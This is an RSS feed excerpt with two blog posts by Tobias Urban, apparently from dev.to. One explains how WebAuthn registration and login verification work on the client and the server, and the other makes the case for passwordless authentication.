      <pubDate>Sat, 12 Oct 2019 08:08:49 +0000</pubDate>
      <link>https://forem.com/urmade/getting-started-with-webauthn-the-basic-flow-45jd</link>
      <guid>https://forem.com/urmade/getting-started-with-webauthn-the-basic-flow-45jd</guid>
      <description>&lt;h1&gt;
  
  
  New to WebAuthn?
&lt;/h1&gt;

&lt;p&gt;If you have never heard of the WebAuthentication standard before, let me tell you something: It's awesome! I've written a &lt;a href="https://dev.to/urmade/building-towards-a-web-without-passwords-lc1"&gt;blog article&lt;/a&gt; that explains what WebAuthn is and why you should definitely use it. I recommend you to check that out first and then come back to the technical parts.&lt;/p&gt;

&lt;h2&gt;
  
  
  What will be covered in this article?
&lt;/h2&gt;

&lt;p&gt;This article is meant as a first introduction into how to implement WebAuthn yourself. It won't cover each required methods step by step (although an article about that is currently coming up), but it will walk you through all necessary steps to implement the specification. Here's what you can expect:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;What is the basic (developers) idea of WebAuthn&lt;/li&gt;
&lt;li&gt;
Registering a new user

&lt;ol&gt;
&lt;li&gt;Step 1: The Client&lt;/li&gt;
&lt;li&gt;Step 2: The Server&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;
&lt;li&gt;
Validating a login request

&lt;ol&gt;
&lt;li&gt;Step 1: The Client&lt;/li&gt;
&lt;li&gt;Step 2: The Server&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What is the basic (developers) idea of WebAuthn?
&lt;/h2&gt;

&lt;p&gt;From a web developers view, WebAuthn is actually quite straight-forward and only offers two functionalities: Signing up a new user and logging in an existing user. For both of these functions, it offers a method under &lt;code&gt;navigator.credentials&lt;/code&gt;: &lt;code&gt;navigator.credentials.create()&lt;/code&gt; and &lt;code&gt;navigator.credentials.get()&lt;/code&gt;. The credentials API also offers the methods &lt;code&gt;navigator.credentials.preventSilentAccess()&lt;/code&gt; which toggles the auto sign-on capabilities to your application and &lt;code&gt;navigator.credentials.store()&lt;/code&gt; which is meant to persist any credential (e.g. username/password) to the browser. Both of these APIs are not part of the WebAuthn standard.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The WebAuthn specification is not yet implemented in all browers (by the time this article got published). &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/credentials"&gt;Check availability&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Implementing WebAuthn always requires a client (e.g. a browser) and a server (or, in specification terms, &lt;em&gt;Relying Party&lt;/em&gt;). On the client-side, you have to provide some options (we will look into these later) to call &lt;code&gt;create()&lt;/code&gt; and &lt;code&gt;get()&lt;/code&gt;, which will then provide you a &lt;a href="https://w3c.github.io/webauthn/#iface-pkcredential"&gt;PublicKeyCredential&lt;/a&gt;. This credential contains different data depending on if you have created a new credential or requested an existing credential. The credential is delivered in a secure context by most clients, meaning it is only handed out over HTTPS and its attributes cannot be directly sent to a server. That wouldn't be a good idea anyways, as the credential object contains a wild mixture of strings and byte arrays. &lt;/p&gt;

&lt;h2&gt;
  
  
  Registering a new user
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Client-side signup
&lt;/h3&gt;

&lt;p&gt;So let's get into the actual doing. Registering a new user starts on the client. Calling &lt;code&gt;navigator.credentials.create()&lt;/code&gt; will push a dialog to the user prompting him to choose an authentication method and using this method to verify themself. But before doing this, we have to configure the so-called &lt;a href="https://w3c.github.io/webauthn/#dictdef-publickeycredentialcreationoptions"&gt;PublicKeyCredentialCreationOptions&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The CreationOptions consist of multiple pieces of information. These are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The ID of your app (namingly the URL on which your app is reachable)&lt;/li&gt;
&lt;li&gt;The ID, name and username of the current user (The latter two will be shown to the user when he signs in)&lt;/li&gt;
&lt;li&gt;A server-side challenge that you can use to ensure this request is actually meant for your app&lt;/li&gt;
&lt;li&gt;A list of allowed public key creation options (depending on which algorithms you allow for public key creation some providers will / won't work)&lt;/li&gt;
&lt;li&gt;A timeout value in milliseconds&lt;/li&gt;
&lt;li&gt;A list of credentials that are not allowed to be created again (basically a security measure to prohibit users creating multiple accounts on the same device)&lt;/li&gt;
&lt;li&gt;Additional data which requirements an authenticator (e.g. Windows Hello, Touch ID) has to fulfill to be eligible to create a credential&lt;/li&gt;
&lt;li&gt;An indication if you wish to also get data about the authenticator and not only the new user credential&lt;/li&gt;
&lt;li&gt;Extensions: Basically every key-value pair you want to include, can be used for information encoding of all sorts&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After calling &lt;code&gt;navigator.credentials.create()&lt;/code&gt; with these options set, you will receive an &lt;a href="https://w3c.github.io/webauthn/#authenticatorattestationresponse"&gt;Authenticator Attestation Response&lt;/a&gt; which also implements the &lt;a href="https://w3c.github.io/webappsec-credential-management/#credential"&gt;Credential&lt;/a&gt; interface (Yep, the specification loves long object names). So basically you get a credential with a credential ID and a type (this field indicates in the W3C specs the opertation you did, namingly webauthn.create or webauthn.get), some client data (like the url at which the credential was created, and your original challenge), and an attestation object. This is a byte sequence, so literally just a list of zeros and ones. This byte array contains all credential-relevant data: The public key, (again) the credential ID and some other, cryptographically relevant information.&lt;/p&gt;

&lt;p&gt;Before you can send this credential object to your server for further operations, you have to encode the information contained in the credential into a string that you can then decode again at your server side. You should send all available data in the credential object to your server, as every attribute has some necessity for the validation of the credentials later on.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Server-side signup
&lt;/h3&gt;

&lt;p&gt;Once you've sent the data to your server, the specification then puts a lot of verification steps in place to make sure you are dealing with an actually legit request. Your first job is to verify the source of the request is actually legit.&lt;/p&gt;

&lt;p&gt;To do so, we got the &lt;a href="https://w3c.github.io/webauthn/#dom-authenticatorresponse-clientdatajson"&gt;clientDataJSON&lt;/a&gt; that contains all source-relevant information. As this is only a stringified JSON by the time your server receives it, you just have to parse it and are ready to go. &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Its &lt;code&gt;type&lt;/code&gt; field indicates for which operation this credential was actually issued, so you have to make sure that field is set to "webauthn.create". &lt;/li&gt;
&lt;li&gt;You then must verify that your server has actually issued the &lt;code&gt;challenge&lt;/code&gt; that is included in the clientData. The challenge is a random string that your server issues whenever some user (automatically) creates new CreationOptions to sign up for your service.&lt;/li&gt;
&lt;li&gt;Make sure that the URL that scheduled this credential is actually the URL you would expect to do this. E.g. if your app runs on "&lt;a href="https://www.awesomeapp.com"&gt;https://www.awesomeapp.com&lt;/a&gt;" and the &lt;code&gt;origin&lt;/code&gt; of the clientData is "&lt;a href="http://phishy.scamsite.to"&gt;http://phishy.scamsite.to&lt;/a&gt;", you would probably want to cancel the request.&lt;/li&gt;
&lt;li&gt;Some clients will also send you a &lt;code&gt;tokenBinding&lt;/code&gt;. This attribute contains information about the TLS connection over which you got your credential, and can be used to validate a secure transfer from the client to your server. &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;After you are done with this, you can be pretty sure the request was issued by a legit source. So we can move on to the actually interesting part - the validation of the credential we just received. To do this, we have to decode first the &lt;a href="https://w3c.github.io/webauthn/#dom-authenticatorattestationresponse-attestationobject"&gt;attestation&lt;/a&gt; and then the &lt;a href="https://w3c.github.io/webauthn/#authenticator-data"&gt;authenticatorData&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;The attestation is a CBOR encoded byte array that tells you all you need to know about how the credential was issued as well as the credential itself. This is also the part where it starts getting tricky. Every authenticator can specify their own attestation, and with that the data contained as well as the validation process are completely different. By now, this led to six different &lt;a href="https://w3c.github.io/webauthn/#sctn-defined-attestation-formats"&gt;Attestation Statement Formats&lt;/a&gt; - they vary in their data content, their verification methods and even in the format in which the verification relevant data is issued.&lt;/p&gt;

&lt;p&gt;We also get the authenticatorData. Here we find the credential itself, information about the circumstances under which the credential was created, and an encrypted version of the Relying Party ID that we specified at creation time in the client.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;To get things started, we first decrypt the attestation and the included authenticatorData. The attestation  The authenticatorData can be parsed byte by byte as the specification gives a clear format on what byte has which information.&lt;/li&gt;
&lt;li&gt;We then verify that the relying party that issued this credential is really us. To do so, we encrypt our relying party ID with the SHA256 algorithm and compare it to the &lt;code&gt;rpIdHash&lt;/code&gt; - if the two are identical, everything is okay.&lt;/li&gt;
&lt;li&gt;We then take care of the &lt;code&gt;flags&lt;/code&gt; - binary values which describe the checks that were done before the credential was issued. We have one flag for &lt;code&gt;userPresent&lt;/code&gt;. This indicates if the presence of the user was verified by showing at least one popup that the user actively clicked before the credential was created. Another flag stands for &lt;code&gt;userVerified&lt;/code&gt;, indicating if the user has passed the check of the authenticator (for example provided a matching fingerprint). The server can decide whether or not to stop the process if one of these flags is false. In the scenario of sign-up, there are very limited use cases where a valid request didn't check for the user presence or their validity, so you should enforce a strict checking (as we see later in the verify section, there are use cases where users don't have to be present in order to log in).&lt;/li&gt;
&lt;li&gt;Now we check if the public key was created with an algorithm that we allowed in the creationOptions. To do so, we can take the &lt;code&gt;credentialPublicKey.kty&lt;/code&gt; value and check it against a list of allowed algorithms we specified beforehand.&lt;/li&gt;
&lt;li&gt;We also have to make sure we didn't receive any unwanted extensions. To do so, we look through the &lt;code&gt;extensions&lt;/code&gt; attribute and compare all extensions to a list of white-labeled extensions that we want in our credential. This is also a good time to process the extensions you specified.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Now comes the fun part: We are done with verifying the context and can now start to verify the attestation itself. To do so, we have six different approaches that are all described in the specification. To not double this already huge article even more, I will only describe the general idea here:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;At first, we determine which format our attestation has. We have a &lt;code&gt;fmt&lt;/code&gt; attribute that tells us in a string representation which format the attestationStatement resembles. But it is actually more secure to also go through all attributes of &lt;code&gt;attestationStatement&lt;/code&gt;and check if each attribute that the format specifies is included.&lt;/li&gt;
&lt;li&gt;The attestation contains a signature. This is the unique proof that an authenticator is really who he claims to be, and every authenticator has their own methods to validate this signature.&lt;/li&gt;
&lt;li&gt;The attestationStatement also contains an &lt;code&gt;AAGUID&lt;/code&gt;(authenticator ID). You can use this ID to make a call to an external, trustworthy service (like FIDO) and if the ID matches their record, they will return a certificate or public key back to you (called a trust anchor). This can be used to determine if the authenticator is who they claim to be.&lt;/li&gt;
&lt;li&gt;The attestation formats use different methods to encrypt their data. You now should use the trust anchor to validate the trustworthiness of the attestation.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you made it this far, you actually did it: You made absolutely sure that the request was legit and that there is an actual user who wants to use your service and wants to sign up for it. All you have left to do now is to store the users credentials in your database.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;First, check if the credential ID is already in use. If there already is a record for this ID in your database, deny the request and indicate that the client should issue a new credential.&lt;/li&gt;
&lt;li&gt;Go ahead and register the new user.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We made it! We actually registered an user to our database, 100% compliant with all current standards. You could of course just skip steps 1 - 14 (excluding step 5) and save yourself a lot of stress and scripting, but then you couldn't be sure that you are actually operating securely in your app. And as a heads up, validating a login is way easier then signing up a new user!&lt;/p&gt;

&lt;h2&gt;
  
  
  Validating a login request
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Client-side validation
&lt;/h3&gt;

&lt;p&gt;Similar to registering a new user, we have to first build up &lt;a href="https://w3c.github.io/webauthn/#dictdef-publickeycredentialrequestoptions"&gt;PublicKeyCredentialRequestOptions&lt;/a&gt;. We don't have to specify as many parameters, though. The necessary information that you need to get a stored users credentials is:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A server-side challenge that you can use to ensure this request is actually meant for your app&lt;/li&gt;
&lt;li&gt;A timeout value in milliseconds&lt;/li&gt;
&lt;li&gt;The ID of your app (namingly the URL on which your app is reachable)&lt;/li&gt;
&lt;li&gt;Additional data which requirements an authenticator (e.g. Windows Hello, Touch ID) has to fulfill to be eligible to create a credential&lt;/li&gt;
&lt;li&gt;A list of credentials that you would expect to receive (all credential IDs that you have stored about the user)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After calling &lt;code&gt;navigator.credentials.get()&lt;/code&gt; with these options set, you will receive an &lt;a href="https://w3c.github.io/webauthn/#authenticatorassertionresponse"&gt;Authenticator Assertion Response&lt;/a&gt; which also implements the &lt;a href="https://w3c.github.io/webappsec-credential-management/#credential"&gt;Credential&lt;/a&gt; interface (so, basically the same as with registering a new user). We get the credential ID (as string and encoded as a byte array), client data (same as in registering an user), authenticator data (reduced version of what we know from registration), a signature and an userHandle, being the ID of the user on which this credential was registered (these are new). We again encode all this information to send it securely to our server.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Server-side validation
&lt;/h3&gt;

&lt;p&gt;Now that we got all information on our server, the first thing we have to get is our user credential record from our own database. We will need the public key that should belong to that request, so we look up the credential ID in our database. After that, we can do the request origin verification we already know from registering an user. We parse the clientDataJSON and check the following (if any of these sound new to you, go to Registering a new user - Server Part):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Is the operation (&lt;code&gt;clientData.type&lt;/code&gt;) &lt;em&gt;webauthn.get&lt;/em&gt;?&lt;/li&gt;
&lt;li&gt;Do we recognize the provided challenge?&lt;/li&gt;
&lt;li&gt;Did we expect the request to come from the given origin url?&lt;/li&gt;
&lt;li&gt;Do we have a &lt;code&gt;tokenBinding&lt;/code&gt; object and does it match our expectations regarding the TLS connection?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After this, we can validate the context of the request (again, same procedure as in the signup process). First we decrypt the authenticator data and then we check the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Does the Resource Provider ID match our expectations?&lt;/li&gt;
&lt;li&gt;Is there an user presence flag set?&lt;/li&gt;
&lt;li&gt;Is there an user verification flag set?&lt;/li&gt;
&lt;li&gt;Does the request send us any extensions? Did we expect those?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In the last two steps, we get to the core of verifying: Does the credential match our records? To do so, we have to first create a sha265 encrypted hash of our clientDataJSON. Then we decrypt the signature that the client has sent us, and we create a joint byte array of the initial authenticator data and the hash of clientDataJSON. If we now verify this Byte Array with the public key in our records, we should get exactly the signature value (which was created in the same procedure and signed by the private key). If not, that means our public key doesn't match the private key of the authenticator and we should therefore deny the request. &lt;/p&gt;

&lt;p&gt;In a last step, we look at the &lt;code&gt;signCount&lt;/code&gt; of the request. This attribute indicates how often the key was already used to log in. We initialized the signCount with a value of 0 at signup time, and if the signCount provided is lower than the number we stored, we should also deny the request.&lt;/p&gt;

&lt;h2&gt;
  
  
  We did it!
&lt;/h2&gt;

&lt;p&gt;And that's it! We now have a secure and intuitive method for our users to access their most private data. And the best thing: It even works completely offline!&lt;br&gt;
If you want to see an implementation of this protocol, you can check out &lt;a href="https://github.com/Urmade/WebAuthn-TypeScript"&gt;this GitHub repository&lt;/a&gt;.&lt;br&gt;
And if you want to dig even deeper into how to build WebAuthn, stay tuned! I will publish an article walking through developing a WebAuthn server step by step soon.&lt;/p&gt;

</description>
      <category>tutorial</category>
      <category>security</category>
      <category>webdev</category>
      <category>identity</category>
    </item>
    <item>
      <title>Building towards a web without passwords</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sun, 06 Oct 2019 17:54:30 +0000</pubDate>
      <link>https://forem.com/urmade/building-towards-a-web-without-passwords-lc1</link>
      <guid>https://forem.com/urmade/building-towards-a-web-without-passwords-lc1</guid>
      <description>&lt;h1&gt;
  
  
  Think of all the online accounts that you have...
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fe0qyxdmo279urxlocnzo.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fe0qyxdmo279urxlocnzo.jpg" alt="A tropical jungle"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Basically all your online passwords in one picture&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;With nearly every one of these comes a (new) password. And for most of the people out there, passwords in the end are all the same. And as they get hacked in one app, all their online presences lie open.&lt;/p&gt;

&lt;p&gt;In the last years, a few approaches came up to tackle that problem. Apps with large userbases like Facebook, Microsoft or Google are offering social logins that link your account directly with your social media account (therefore making them your primary Identity Provider), sparing you one more password to remember. But you are still trusting on that social media account staying secure, and you are giving out a lot of data to that Identity Provider (which is up to your judgement if that is a good thing).&lt;/p&gt;

&lt;p&gt;Another approach are password managers. With just one (hopefully more secure) password you can access randomly generated passwords to all your accounts, making each secret unique and therefore independent from your other accounts. But again you are relying on a single source of truth, and if your master password is stolen, all of your accounts are breached.You could of course add additional layers of security with Multi-Factor Authentication, but these often require additional hardware and can be costly to implement for the App creator (e.g. when you have to pay for SMS fees).&lt;/p&gt;

&lt;h2&gt;
  
  
  Introducing: WebAuthentication
&lt;/h2&gt;

&lt;p&gt;The major OS providers Microsoft, Google and Apple have tackled this problem already a few years ago when they introduced password-less authentication on their systems. It is nowadays a de-facto standard for new devices to have some sort of fingerprint or face recognition that offers you to access your devices without remembering any passwords. And the best feature: Usually your biometric data is stored directly on the device, making it impossible to breach some database of face or finger data.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fmozknab9dmvbg892n8pw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fmozknab9dmvbg892n8pw.png" alt="Windows Hello Facial recognition sign-in screen"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;With biometrics you are the password&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Now that this technology has matured and got the go-to choice for most users in their everyday life, the question arised: How do we get that into the web? And frankly, the W3C tackled exactly this question with their &lt;a href="https://w3c.github.io/webauthn/" rel="noopener noreferrer"&gt;WebAuthn specification&lt;/a&gt;. The specification is currently only a draft, but most of the major players have already adopted the proposed standards and it is useable on Windows, Android, iPhone (to some extend) and MacOS already.&lt;/p&gt;

&lt;p&gt;The basic idea is quite simple: Instead of asking for a password, the browser uses native login methods (e.g. Windows Hello, Touch ID) to verify the user. The application then gets a huge package of encrypted information that can be used to verify that it was actually the user who tried to log in (and not some hacker). After successful registration, the browser then stores a private key on the users device, not exposable in any way. The server gets the according public key and a credential ID that it can store securely instead of a password.&lt;/p&gt;

&lt;p&gt;If you are interested in the experience from the perspective of an user, check out &lt;a href="https://webauthndemotu2.azurewebsites.net" rel="noopener noreferrer"&gt;this demo&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  How is this more secure?
&lt;/h2&gt;

&lt;p&gt;Every user who logs into an app is protected by multiple layers: First, the app has to find the user in its system. The app should have stored the credential ID next to the user ID. The credential ID is useful only for the browser in which the user signed in. If the browser recognizes the credential ID, it will then prompt the user for authentication. If the user passes the authentication (e.g. by providing a security key USB stick or by using Windows Hello / Touch ID), the browser can send some verifiable data to the app. This data will then be verified by the server with the public key it got at sign-up time. If this process succeeds, then the login is successful.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fskmzj0wlq3rc3bhizmvr.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fskmzj0wlq3rc3bhizmvr.jpg" alt="A game of poker"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;A good representation of how few Authn trusts your login approach&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;From an app standpoint, WebAuthn offers another awesome benefit: You don't have to store any passwords. All you get from an user is a public key and a credential ID. Both work only if the user in on their device, on your page URL. So let's assume your servers get breached and all credentials are stolen. In the classic password world, this means major security risks for everyone who ever worked on your app. With WebAuthn, your users can just move on, and as long as their device and face/finger/Security Key don't get stolen, their access to your app is still safe. And all other applications where they use WebAuthn to log in are not impacted by this at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  So can I just use this everywhere now?
&lt;/h2&gt;

&lt;p&gt;WebAuthentication is an exciting protocol that offers a new level of security to users who want to take an extra step in protecting their online data. But by design, this extra step comes with a few inconveniences that your users have to take. By nature, all credentials are stored on the clients device, more specifically in the app or browser that your user has used to log into your services. That means, as soon as your users switches to a new device or to a new browser on their current device, he has to sign up again with new login credentials for your service.&lt;/p&gt;

&lt;p&gt;For scenarios like this you will always depend on other, more universal authentication methods. Let's say an user loses their device, so there is no way to log in with the credentials that you have currently stored. In moments like this, you should always be able to fall back to e.g. email verification, or a standard password.&lt;/p&gt;

&lt;p&gt;Generally speaking, although WebAuthn does look promising in enabling a new layer of security, it is just a tool. It is always the responsibility of the app providers to ensure a secure environment for your users, and WebAuthn should be one of many locks that you put in front of your users data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Enough Intro talk, where can I learn more?
&lt;/h2&gt;

&lt;p&gt;This article is just the kick-off to a series of technical posts about WebAuthn that I plan to launch. You can find the articles here:&lt;br&gt;
&lt;a href="https://dev.to/urmade/getting-started-with-webauthn-the-basic-flow-45jd"&gt;Getting started with WebAuthn: The basic flow&lt;/a&gt;&lt;br&gt;
Securing your WebAuthn server: Response validation (Coming soon)&lt;br&gt;
WebAuthn Step by Step: A specification rundown in code (Coming soon)&lt;/p&gt;

&lt;p&gt;I have also prepared the code for the demo as a learning implementation &lt;a href="https://github.com/Urmade/WebAuthn-TypeScript" rel="noopener noreferrer"&gt;on my Github&lt;/a&gt;. I tried to keep the documentation as extensive as possible, so you can just read through the source code and learn more about implementing this protocol. On the GitHub page you can also find a list of resources by other parties who have written great examples of how to get started with WebAuthn. And make sure to check out &lt;a href="https://w3c.github.io/webauthn/" rel="noopener noreferrer"&gt;the official documentation&lt;/a&gt; as well!&lt;/p&gt;

</description>
      <category>security</category>
      <category>webauthentication</category>
      <category>javascript</category>
      <category>webdev</category>
    </item>
  </channel>
</rss>
